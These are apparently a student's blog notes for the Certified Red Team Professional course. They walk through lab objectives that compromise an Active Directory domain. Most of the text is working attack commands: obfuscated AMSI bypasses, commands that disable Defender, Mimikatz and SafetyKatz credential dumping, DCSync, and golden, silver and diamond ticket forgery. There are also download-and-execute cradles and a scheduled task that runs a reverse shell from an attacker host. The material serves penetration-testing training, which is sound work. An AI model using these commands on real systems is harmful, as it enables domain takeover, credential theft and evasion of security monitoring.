Home Certified Red Team Professional Notes
Post
Cancel

Certified Red Team Professional Notes

Certified Red Team Professional Notes

Week 1

• Enumerate useful information like users, groups, group memberships, computers, user properties, trusts, ACLs etc. to map attack paths!

• Learn and practice different local privilege escalation techniques on a Windows machine.

• Hunt for local admin privileges on machines in the target domain using multiple methods.

• Abuse enterprise applications to execute complex attack paths that involve bypassing antivirus and pivoting to different machines.

Learning Objective 1

Enumerating Users, Computers, Domain Admins, and Enterprise Admins.

Using PowerView

Start a PowerShell session using Invisi-Shell to avoid enhanced logging. (\AD\Tools\InvisiShell\RunWithRegistryNonAdmin.bat)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
C:\Users\studentx>cd \AD\Tools
C:\AD\Tools>C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
C:\AD\Tools>set COR_ENABLE_PROFILING=1
C:\AD\Tools>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}
C:\AD\Tools>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}" /f
The operation completed successfully.
C:\AD\Tools>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-
b283c03916db}\InprocServer32" /f
The operation completed successfully.
C:\AD\Tools>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}\InprocServer32" /ve /t REG_SZ /d
"C:\AD\Tools\InviShell\InShellProf.dll" /f
The operation completed successfully.
C:\AD\Tools>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Load Powerview in the PowerShell Session

1
. C:\Ad\Tools\PowerView.ps1

To see users in the domain,

1
Get-DomainUser

and to get only a specific property of all users, use the select-object cmdlet as such.

1
Get-DomainUser | select -ExpandProperty samaccountname

To see domain computer objects

1
Get-DomainComputer | select -ExpandProperty dnshostname

to see details of the DA group, can get SIDs, Membernames

1
Get-DomainGroup -Identity "Domain Admins"

To enumerate members of the EA group

1
Get-DomainGroupMember -Identity "Enterprise Admins"

If you are not in the root domain, this command will not work. You need to query the root domain as EA group is only present in the root of the forest.

1
Get-DomainGroupMember -Identity "Enterprise Admins" -Domain moneycorp.local

Using ADModule

In a different invisishell session, import the ADModule with

1
2
3
4
5
Import-Module C:\AD\Tools\ADModule-master\Microsoft.ActiveDirectory.Management.dll

and 

Import-Module C:\AD\Tools\ADModule-master\ActiveDirectory\ActiveDirectory.psd1

Then you can begin user enumeration with

1
Get-ADUser -Filter *

Use the -Properties paramter to filter by the properties you want to see, for example

1
Get-ADUser -Filter * -Properties * | select Samaccountname,Description

To list computers

1
Get-ADComputer -Filter *

Enumerate Domain Administrators with

1
Get-ADGroupMember -Identity 'Domain Admins'

Enumerate Enterprise Admins with

1
Get-ADGroupMember -Identity 'Enterprise Admins' -Server moneycorp.local

Learning Objective 2

Enumerate OUs, list all computers in the StudentMachines OU, List the GPOs, Enumerate GPO applied on the StudentMachines OU.

PowerView

To list all OUs

1
Get-DomainOU

To only see the names of OUs

1
Get-DomainOU | select -ExpandProperty name

Listing all computers in the StudentMachines OU more complicated

1
(Get-DomainOU -Identity StudentMachines).distinguishedname |  %{Get-DomainComputer -SearchBase $_} | select name

To get GPOs

1
Get-DomainGPO

To Enumerate GPO applied on the StudentMachines OU, you need to copy part of the gplink attribute from the output of the command below:

1
(Get-DomainOU -Identity StudentMachines).gplink

The part you need to copy will look like

{7478F170-6A0C-490C-B355- 9E4618BC785D}

Then, to see GPO applied to StudentMachines, use

1
2
Get-DomainGPO -Identity '{7478F170-6A0C-490C-B355-
9E4618BC785D}'

With powershell magic, you can do this all in one command:

1
Get-DomainGPO -Identity (Get-DomainOU -Identity StudentMachines).gplink.substring(11, (Get-DomainOU -Identity StudentMachines).gplink.length-72)

Learning Objective 3

Enumerate ACL for DA group, and view modify rights and permissions for students.

Using PowerView

To enumerate ACLs in the Domain Admins Group

1
Get-DomainObjectAcl -Identity "Domain Admins" -ResolveGUIDS -Verbose

To check for modify rights/permissions, use Find-InterestingDomainACL from powerview as such

1
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "<student name>"}

To see permissions for the RDP group

1
2
Find-InterestingDomainAcl -ResolveGUIDs |
?{$_.IdentityReferenceName -match "RDPUsers"}

Learning Objective 4

Using Powerview

To enumerate all domains in the current forest

1
Get-ForestDomain -Verbose

To map all the trusts of the domain

1
Get-DomainTrust

To list only the external trusts in the moneycorp.local forest

1
2
Get-ForestDomain | %{Get-DomainTrust -Domain $_.Name} |
?{$_.TrustAttributes -eq "FILTER_SIDS"}

To identiy external trusts of the dollarcorp domain, we can use the below command.

1
Get-DomainTrust | ?{$_.TrustAttributes -eq "FILTER_SIDS"}

Since we have Bidirectional trust between these 2 forests, we can extract information from the eurocorp.local forest. You need either bi-directional or one-way trust from the eurocorp.local to dollarcorp to be able to use the below command.

1
2
Get-ForestDomain -Forest eurocorp.local | %{Get-DomainTrust -
Domain $_.Name}

Learning Objective 5

In this learning objective we will exploit a service on our machine to elevate privileges to local admin. Then Identiy a machine on the domain where we have local admin access. Also we use privileges of a user on jenkins on a host to get admin privileges on the dcorp-ci server.

We begin by loading powerview after bypassing amsi.

1
2
. C:\AD\Tools\PowerUp.ps1
Invoke-AllChecks

We can use the abuse-function (Invoke-ServiceAbuse) and add our current domain user to the local Administrators group.

1
Invoke-ServiceAbuse -Name 'AbyssWebServer' -UserName 'dcorp/student520' -Verbose

Logging in and out shows we have local administrator privileges.

For the next task, we will identify a machine in the domain where we have local admin using the Find-PSRemotingLocalAdminAccess.ps1

1
2
3
4
C:\AD\Tools>C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
[snip]
PS C:\AD\Tools> . C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1
PS C:\AD\Tools> Find-PSRemotingLocalAdminAccess

We have admin access on dcorp-adminsrv and on the student machine, we can connect to dcorp-adminsrv using winrs as the student user with

1
winrs -r:dcorp-adminsrv cmd

Or you can do it with PowerShell Remoting

1
2
3
PS C:\AD\Tools> Enter-PSSession -ComputerName dcorpadminsrv.dollarcorp.moneycorp.local
PS C:\AD\Tools> [dcorpadminsrv.dollarcorp.moneycorp.local]C:\Users\studentx\Documents> whoami
dcorp\studentx

Learning Objective 6

This learning objective focuses on setting up BloodHound to identify the shortest path to Domain Admins in the domain. BLoodhound uses neo4j graph database, so that needs to be set up first.

Install and start the neo4j service as follows:

1
2
3
C:\AD\Tools\neo4j-community-4.4.5-windows\neo4j-community4.4.5\bin>neo4j.bat install-service
Neo4j service installed
C:\AD\Tools\neo4j-community-4.4.5-windows\neo4j-community4.4.5\bin>neo4j.bat start

Once the service is installed browse to localhost:7474 and login with neo4j:neo4j creds, and openblood hound from C:\AD\Tools\bloodHound-win32-x64\BloodHound-win-32-x64 and provide the details

bolt://localhost:7687 and the user/pass you set in the previous step. Then run the .net AMSI bypass by using this

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
$ZQCUW = @"
using System;
using System.Runtime.InteropServices;
public class ZQCUW {
 [DllImport("kernel32")]
 public static extern IntPtr GetProcAddress(IntPtr hModule, string
procName);
 [DllImport("kernel32")]
 public static extern IntPtr LoadLibrary(string name);
 [DllImport("kernel32")]
 public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr
dwSize, uint flNewProtect, out uint lpflOldProtect);
}
"@
Add-Type $ZQCUW
$BBWHVWQ =
[ZQCUW]::LoadLibrary("$([SYstem.Net.wEBUtIlITy]::HTmldecoDE('&#97;&#109;&#115
;&#105;&#46;&#100;&#108;&#108;'))")
$XPYMWR = [ZQCUW]::GetProcAddress($BBWHVWQ,
"$([systeM.neT.webUtility]::HtMldECoDE('&#65;&#109;&#115;&#105;&#83;&#99;&#97
;&#110;&#66;&#117;&#102;&#102;&#101;&#114;'))")
$p = 0
[ZQCUW]::VirtualProtect($XPYMWR, [uint32]5, 0x40, [ref]$p)
$TLML = "0xB8"
$PURX = "0x57"
$YNWL = "0x00"
$RTGX = "0x07"
$XVON = "0x80"
$WRUD = "0xC3"
$KTMJX = [Byte[]] ($TLML,$PURX,$YNWL,$RTGX,+$XVON,+$WRUD)
[System.Runtime.InteropServices.Marshal]::Copy($KTMJX, 0, $XPYMWR, 6)

Then run the following commands to run the collector:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
C:\AD\Tools>C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
PS C:\AD\Tools> cd C:\AD\Tools\BloodHound-master\BloodHound-master\Collectors
PS C:\AD\Tools\BloodHound-master\BloodHound-master\Collectors> $ZQCUW
[snip .NET AMSI bypass]
PS C:\AD\Tools\BloodHound-master\BloodHound-master\Collectors> .
.\SharpHound.ps1
PS C:\AD\Tools\BloodHound-master\BloodHound-master\Collectors> InvokeBloodHound -CollectionMethod All -Verbose
2023-03-03T07:01:16.5006490-08:00|INFORMATION|This version of SharpHound is
compatible with the 4.2 Release of BloodHound
2023-03-03T07:01:16.8282702-08:00|INFORMATION|Resolved Collection Methods:
Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container,
RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2023-03-03T07:01:16.8595176-08:00|INFORMATION|Initializing SharpHound at 7:01
AM on 3/3/2023
2023-03-03T07:01:22.3601219-08:00|INFORMATION|Flags: Group, LocalAdmin,
GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps,
DCOM, SPNTargets, PSRemote
[snip]
SharpHound Enumeration Completed at 7:02 AM on 3/3/2023! Happy Graphing!

Once the data is uploaded to bloodhound, search for shortest path to domain admins, ctrl will toggle labels.

Learning Objective 7

Identify a machine in the target domain where a domain admin session is available, and compromise the machine and escalate to prvileges to domain admin.

From our reverse shell we got on the CI machine through jenkins, we can grab PowerView from our attack machine and look for machines where a domain admin is logged in using Find-DomainUserLocation.

First you grab the sbloggingbypass.txt from the attackers machine with

1
2
PS C:\Users\Administrator\.jenkins\workspace\Projectx> iex (iwr
http://172.16.100.x/sbloggingbypass.txt -UseBasicParsing)

use the below command to bypass AMSI

1
2
3
4
5
6
7
8
9
PS C:\Users\Administrator\.jenkins\workspace\Projectx> S`eT-It`em ( 'V'+'aR'
+ 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) )
; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL
)."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -
f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'
s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -
f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f
('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"(
${n`ULl},${t`RuE} )

Then download and executre PowerView in memory on the victim machine with

1
2
iex ((New-Object
Net.WebClient).DownloadString('http://172.16.100.X/PowerView.ps1'))

Make sure to host the file using HFS.exe or your prefered choice of hosting software. Then run

1
Find-DomainUserLocation

This command can take a while, but you can see if there is a domain admin session available. You can abuse it by using winrs or powershell remoting. To use winrs, use

1
winrs -r:dcorp-mgmt hostname;whoami

Then we can run safetykatz.exe on the dcorp-mgmt to extract credentials. To do that, we need to copy loader.exe on dcorp-mgmt from the dcorp-ci machine we have to avoid any downloading activity on dcorp-mgmt.

Run the following command on the reverse shell

1
iwr http://172.16.100.20/Loader.exe -OutFile C:\Users\Public\Loader.exe

Then copy it to the victim machine as such

1
echo F | xcopy C:\Users\Public\Loader.exe \\dcorp-mgmt\C$\Users\Public\Loader.exe

Using winrs add the following port forward rule on dcorp-mgmt to avoid detected

1
$null | winrs -r:dcorp-mgmt "netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.20"

Note that the $null variable is used to address output redirection issues. Use loader.exe to download and execute SafetyKatz.exe in memory on the dcorp-mgmt machine with this command on the reverse shell

1
$null | winrs -r:dcorp-mgmt C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe sekurlsa::ekeys exit

To do it with powershell remoting, first check we can run commands on the dcorp-mgmt machine with

1
Invoke-Command -ScriptBlock {whoami;hostname} -ComputerName dcorp-mgmt

Then we’ll use Invoke-Mimi.ps1. Start by hosting it on your machine and running this on the reverse shell

1
iex (iwr http://172.16.100.20/Invoke-Mimi.ps1 -UseBasicParsing)

Then we need to disable AMSI on the dcorp-mgmt machine, we can do the AMSI bypass shown earlier or use the built in Set-MpPreference as well because we are admins on the dcorp-mgmt machine.

1
2
3
$sess = New-PsSession -ComputerName dcorp-mgmt.dollarcorp.moneycorp.local
Invoke-Command -ScriptBlock{Set-MpPreference -DisableIOAVProtection $true} -Session $sess
Invoke-Command -ScriptBlock ${function:Invoke-Mimi} -Session $sess

Using Rubeus:

1
C:\AD\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:<aes256 hash> /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

Will open a new process, which we can access the domain controller using

1
winrs -r:dcorp-dc whoami

Now we need to escalate to domain admin using derivative local admin. Let’s find out the machines which we have local admin privileges by loading a powershell session with invisishell and enter the following commands

1
2
PS C:\AD\Tools> . C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1
PS C:\AD\Tools> Find-PSRemotingLocalAdminAccess

We have local admin on the dcorp-adminsrv, but any attempt to run loader.exe results in error ‘this program is blocked by group policy’, and any attempts to run invoke-mimi results in errors about language mode. This is because we are dropped into Constrained Language Mode when using PSRemoting. We can check if applocker is configured on dcorp-adminsrv by querying registry keys.

1
2
winrs -r:dcorp-adminsrv cmd
reg query HKLM\Software\Policies\Microsft\Windows\SRPV2

and it looks like applocker is configured. Going through the policies will show that only Microsoft signed binaries and scripts are allowed, however there is a certain rule that is overly permissive.

1
2
3
4
5
6
7
8
9
10
11
C:\Users\studentx>reg query
HKLM\Software\Policies\Microsoft\Windows\SRPV2\Script\06dce67b-934c-454fa263-2515c8796a5d
reg query HKLM\Software\Policies\Microsoft\Windows\SRPV2\Script\06dce67b934c-454f-a263-2515c8796a5d
AlteredSecurity Attacking and Defending Active Directory 41
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\SRPV2\Script\06dce67b934c-454f-a263-2515c8796a5d
 Value REG_SZ <FilePathRule Id="06dce67b-934c-454f-a263-
2515c8796a5d" Name="(Default Rule) All scripts located in the Program Files
folder" Description="Allows members of the Everyone group to run scripts that
are located in the Program Files folder." UserOrGroupSid="S-1-1-0"
Action="Allow"><Conditions><FilePathCondition
Path="%PROGRAMFILES%\*"/></Conditions></FilePathRule>

A default rule is enabled that allows everyone to run scripts from the C:\Program Files\ Folder. We can also confirm this using powershell as such

1
2
3
4
5
6
Enter-PSSession dcorp-adminsrv

$ExecutionContext.SessionState.LanguageMode

Get-AppLockerPolicy -
Effective | select -ExpandProperty RuleCollections

We can drop scripts in the Program Files directory and execute them from there, but we’ll need to disable defender first using

1
 Set-MpPreference -DisableRealtimeMonitoring $true -Verbose

Also, because we can not . source scripts because of the CLM, we must modify Invoke-Mimi.ps1 to include the function call in the script itself and transfer the modified script to the target server.

Create Invoke-MimiEx.ps1

  • Create a copy of Invoke-Mimi.ps1 and rename it to Invoke-MimiEx.ps1.
  • Open Invoke-MimiEx.ps1 in PowerShell ISE (Right click on it and click Edit).
  • Add “Invoke-Mimi -Command ‘“sekurlsa::ekeys”’ “ (without quotes) to the end of the file.

Then run this command to copy it to the target machine

1
Copy-Item C:\AD\Tools\Invoke-MimiEx.ps1 \\dcorpadminsrv.dollarcorp.moneycorp.local\c$\'Program Files'

Then run the script without . sourcing as such

1
.\Invoke-MimiEx.ps1

And we can get credentials for srvadmin, appadmin, and websvc users. From local system (as admin) we can overpass the hash using safetykatz:

1
2
3
4
C:\AD\Tools\SafetyKatz.exe "sekurlsa::pth /user:srvadmin
/domain:dollarcorp.moneycorp.local
/aes256:145019659e1da3fb150ed94d510eb770276cfbd0cbd834a4ac331f2effe1dbb4
/run:cmd.exe" "exit"

The new process spawned has srvadmin privileges, we can check if srvadmin has admin privileges on other machines as such:

1
2
3
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
. C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1
Find-PSRemotingLocalAdminAccess -Verbose

And we will see that we have local admin access on the dcorp-mgmt as srvadmin, which we know already has a session of svcadmin. We can use SafetyKatz to extract more credentials from the machine. Run the below commands from the process running as srvadmin. First copy the loader to dcorp-mgmt:

1
 echo F | xcopy C:\AD\Tools\Loader.exe \\dcorpmgmt\C$\Users\Public\Loader.exe

extract the credentials:

1
2
3
winrs -r:dcorp-mgmt cmd
>C:\Users\Public\Loader.exe -path
http://127.0.0.1:8080/SafetyKatz.exe sekurlsa::ekeys exit

We can also use Invoke-Mimi with PSRemoting as such

1
Enter-PSSession -ComputerName dcorp-mgmt

And then disable AMSI using the “set item” blob. then download and execute InvokeMimi as following

1
2
3
iex (iwr http://172.16.100.X/Invoke-Mimi.ps1 -UseBasicParsing)

Invoke-Mimi -Command '"sekurlsa::ekeys"'

We can also use Invoke-Mimi to look for credentials from the credentials vault, sometimes interesting credentials like those used for scheduled tasks will be stored here. You can do this as such:

1
Invoke-Mimi -Command '"token::elevate" "vault::cred /patch"'

Finally, we can use the svcadmin credentials on the student VM using OverPasstheHaash as such:

1
2
3
> C:\AD\Tools\Rubeus.exe asktgt /user:svcadmin
/aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011
/opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt 

And the new process wil start with the privileges of SVCadmin.

Learning Objective 8

In this learning objective we will extract secrets from the DC of dollarcorp, using the secrets of KRBTGT account to make a golden ticket, and use the golden ticket to get domain admin privileges from a machine.

Using SafetyKatz.exe

Run the below command from an admin cmd prompt to start a process with DA privileges:

1
2
3
C:\AD\Tools\Rubeus.exe asktgt /user:svcadmin
/aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011
/opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

Then run the below commands from the process running as DA to copy loader.exe onto the DC and use it to extract credentials

1
2
3
4
5
6
7
8
9
10
11
echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-dc\C$\Users\Public\Loader.exe /Y

winrs -r:dcorp-dc cmd

netsh interface portproxy add v4tov4 listenport=8080
listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.20

C:\Users\Public\Loader.exe -path
http://127.0.0.1:8080/SafetyKatz.exe

lsadump::lsa /patch

or, to get the NTLM hash and AES keys of the krbtgt account, we can use the DCSync attack as follows from the DA process:

1
2
C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync
/user:dcorp\krbtgt" "exit"

Finally, we can use BetterSafetyKatz.exe to create a golden ticket as such

1
2
3
4
5
6
C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648
/aes256:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"

klist (will show cached ticket with client: Administrator)

dir \\dcorp-dc\c$

Using Powershell remoting and Invoke-Mimi.ps1

Start a process with domain admin privileges and run the below command from an elevated shell:

1
2
3
4
5
6
7
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

. C:\AD\Tools\Invoke-Mimi.ps1

Invoke-Mimi -Command '"sekurlsa::pth /user:svcadmin
/domain:dollarcorp.moneycorp.local /ntlm:b38ff50264b74508085d82c69794a4d8
/run:cmd.exe"'

Then run the below commands in the process running as DA

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

cd C:\AD\Tools

$sess = New-PSSession -ComputerName dcorp-dc

Enter-PSSession $sess

S`eT-It`em ( 'V'+'aR' + 'IA' +
('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; (
Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"((
"{6}{3}{1}{4}{2}{0}{5}" -
f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'
s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -
f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f
('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"(
${n`ULl},${t`RuE} )

exit

Invoke-Command -FilePath .\Invoke-Mimi.ps1 -Session $sess

Enter-PSSession $sess

Invoke-Mimi -Command '"lsadump::lsa /patch"'

We can also run DCSync from the process running as DA as such:

1
Invoke-Mimi -Command '"lsadump::dcsync /user:dcorp\krbtgt"'

And create the golden ticket with:

1
2
Invoke-Mimi -Command '"kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid: S-1-5-21-719815819-3726368948-3917688648 /aes256:
154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'

and check with

1
ls \\dcorp-dc \c$

We can also run WMI commands on the DC

1
gwmi -Class win32_computersystem -ComputerName dcorp-dc

Learning Objective 9

Objective: Get command execution on the domain controller by creating silver ticket for Host service and WMI. From the information gathered in the previous objective, we have the hash for the machine account of the domain controller (dcorp-dc$). Using the below command we can create a Silver Ticket that provides us access to the HOST service of the DC. Run this command from an elevated shell:

1
C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid: S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:98fb9b154f614d933422b877cd3f2e98 /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"

Or you can use Invoke-Mimi for the same results using:

1
Invoke-Mimi -Command '"kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:98fb9b154f614d933422b877cd3f2e98 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'

In either case, you should see Golden ticket for 'Administrator @ dollarcorp.moneycorp.local successfully submitted for current session.

We can then start a listener and schedule a task to run the reverse shell script using Invoke-PowerShellTcpEx.ps1. First create a copy of Invoke-PowerShellTcp.ps1 and rename it Invoke-PowerShellTcpEx.ps1 and add the function call Power -Reverse -IPAddress 172.16.100.20 -Port 443 to the end of the file. Then run the below command in the process where we injected the ticket for the HOST service. Make sure your listener is already running.

1
2
3
4
schtasks /create /S dcorp-dc /SC Weekly /RU "NT Authority\SYSTEM" /TN "User520" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.20/InvokePowerShellTcpEx.ps1''')'"

schtasks /Run /S dcorp-dc.dollarcorp.moneycorp.local /TN
"User520"

To access WMI, we need to create two tickets, one for the HOST service and another for RPCSS. run the below commands from an elevated shell.

1
2
3
4
5
C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden
/User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-
719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local
/service:HOST /rc4:98fb9b154f614d933422b877cd3f2e98 /startoffset:0 /endin:600
/renewmax:10080 /ptt" "exit"

Inject a ticket for RPCSS:

1
2
3
4
5
C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden
/User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-
719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local
/service:RPCSS /rc4:98fb9b154f614d933422b877cd3f2e98 /startoffset:0
/endin:600 /renewmax:10080 /ptt" "exit"

Check if the ticket is present with klist and look for Server:RPCSS/dcorp-dc.dollarcorp.moneycorp.local and HOST/dcorp-dc.dollarcorp.moneycorp.local

Now run the WMI commands on the domain controller:

1
2
3
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

Get-WmiObject -Class win32_operatingsystem -ComputerName dcorp-dc

Learning Objective 10

We will use the domain admin prviliges obtained earlier to execute a Diamond Ticket attack. We can use Rubeus to execute the attack from cmd (run as admin)

1
2
C:\AD\Tools\Rubeus.exe diamond /krbkey:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /tgtdeleg /enctype:aes /ticketuser:administrator
/domain:dollarcorp.moneycorp.local /dc:dcorp-dc.dollarcorp.moneycorp.local /ticketuserid:500 /groups:512 /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

Then access the DC using winrs from the new spawned process:

1
winrs -r:dcorp-dc cmd

Learning Objetive 11

Using DA privileges obtained earlier to abuse the DSRM credential for persistence. We can do this by opening a remote powershell session, or other tools like SafetyKatz, BetterSafetyKatz, etc.

1
2
3
4
5
6
7
8
9
10
11
12
PS C:\AD\Tools\> $sess = New-PSSession dcorp-dc
PS C:\AD\Tools\> Enter-PSSession -Session $sess
[dcorp-dc]: PS C:\Users\svcadmin\Documents> S`eT-It`em ( 'V'+'aR' + 'IA' +
('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; (
Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"((
"{6}{3}{1}{4}{2}{0}{5}" -
f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'
s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -
f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f
('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"(
${n`ULl},${t`RuE} )
[dcorp-dc]: PS C:\Users\svcadmin\Documents>exit

Then load the Invoke-Mimi script in the session:

1
Invoke-Command -FilePath C:\AD\Tools\Invoke-Mimi.ps1 -Session $sess

Then we will extract the SAM file from the DC. The Directory Services Restore Mode pasword is mapped to the local admin on the DC.

1
2
3
Enter-PSSession -Session $sess

Invoke-Mimi -Command '"token::elevate" "lsadump::sam"'

The DSRM admin is not allowed to logon to the DC from the network, so we can chagne the logon behavior for the account by modifying the registry on the DC as shown:

1
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD

Then from our local system we can pass the NTLM hash for the DSRM administrator and access the dc from our new session:

1
2
3
Invoke-Mimi -Command '"sekurlsa::pth /domain:dcorp-dc /user:Administrator /ntlm:a102ad5753f4c441e3af31c97fad86fd /run:powershell.exe"'

ls \\dcorp-dc.dollarcorp.moneycorp.local\c$

Learning Objective 12

In this objective we will be checking if our user has DCSync (replication) rights. If so, we will execute the DCsync attack to pull hashes and AES keys of krbtgt user, if not, we will add the replication rights for our user and then perform the attack.

We can check if we have replication rights using the following commands, where student520 is the username we want to check

1
2
3
4
5
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
[snip]
. C:\AD\Tools\PowerView.ps1
Get-DomainObjectAcl -SearchBase "DC=dollarcorp,DC=moneycorp,DC=local" -SearchScope Base -ResolveGUIDs | ?{($_.ObjectAceType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')} | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_} |
?{$_.IdentityName -match "student520"}

If we do not have the rights, we can add the rights by first starting a process as Domain Admin by running the below command from an elevated command prompt:

1
C:\AD\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

Then run the below commands in the process spawned by rubeus to add the rights:

1
2
3
4
5
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

. C:\AD\Tools\PowerView.ps1

Add-DomainObjectAcl -TargetIdentity 'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalIdentity student520 -Rights DCSync -PrincipalDomain dollarcorp.moneycorp.local - TargetDomain dollarcorp.moneycorp.local -Verbose

Then check for rights again using the previous Get-DomainObjectAcl command, you should be looking for these strings to have AccessAllowed

ObjectAceType : DS-Replication-Get-Changes-In-Filtered-Set

ObjectAceType : DS-Replication-Get-Changes

ObjectAceType : DS-Replication-Get-Changes-All

We can then use SafetyKatz.exe to get the hashes of the krbtgt or any other user, as the DC contains all the user’s secrets in the domain

1
C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit"

Learning Objective 13

In this objective we will be modifying security descriptors on the domain controller to get access using PowerShell remoting and WMI without requiring administrator access. We will retreive the machine account hash from dcorp-dc without using administrator access and use that to execute a silver ticket attack to get code execution with WMI.

Once we have administrative privileges on a machine, we can modify the security descriptors of services to access the services without admin prviliges. Below command (to be run as DA) modifies the host security descriptors for WMI on the DC to allow the student to access WMI

1
2
3
4
5
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

. C:\AD\Tools\RACE.ps1

Set-RemoteWMI -SamAccountName student520 -ComputerName dcorp-dc -namespace 'root\cimv2' -Verbose

